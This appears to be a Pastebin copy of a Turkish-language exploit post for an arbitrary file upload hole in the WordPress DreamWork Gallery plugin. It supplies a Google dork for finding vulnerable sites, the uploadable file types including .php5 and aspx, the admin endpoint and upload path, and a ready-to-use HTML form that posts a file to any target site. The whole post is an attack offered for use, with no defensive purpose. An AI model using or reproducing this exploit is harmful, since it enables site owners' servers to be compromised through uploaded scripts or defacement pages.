Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Exploitin Türkçe Yazarı => KingSkrupellos - Cyberizm Digital Security Team
- [img]https://i.hizliresim.com/r27RZz.png[/img]
- Exploitin Başlığı => WordPress DreamWork Gallery Exploit Arbitrary File Upload Vulnerability
- [ WP Dreamwork Galerisi Rasgele Dosya Yükleme Açığı ]
- Konu => https://www.cyberizm.org/cyberizm-wordpress-dreamworks-gallery-exploit.html
- Videolu Anlatım =>
- [video=youtube]https://www.youtube.com/watch?v=Vr6wCa4wnII[/video]
- Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- Siteler Ekleyebileceğimiz Dosya Uzantılara => .txt - .php5 - aspx, html
- Sitelere Dosyanın Yüklendiği Dizin =>
- Exploit Kısa Kod =>
- HEDEFSITE/wp-admin/admin.php?page=dreamwork_manage
- HEDEFSITE/wp-content/uploads/dreamwork/1_uploadfolder/big/DOSYANIZ.html
- Exploit Kodu =>
- [hide][code]
- <html>
- <body>
- <form action="HEDEFSITE/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
- <input type="hidden" name="task" value="drm_add_new_album" />
- <input type="hidden" name="album_name" value="Arbitrary File Upload" />
- <input type="hidden" name="album_desc" value="Arbitrary File Upload" />
- <input type="file" name="album_img" value="" />
- <input type="submit" value="Submit" />
- </form>
- </body>
- </html>[/code][/hide]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement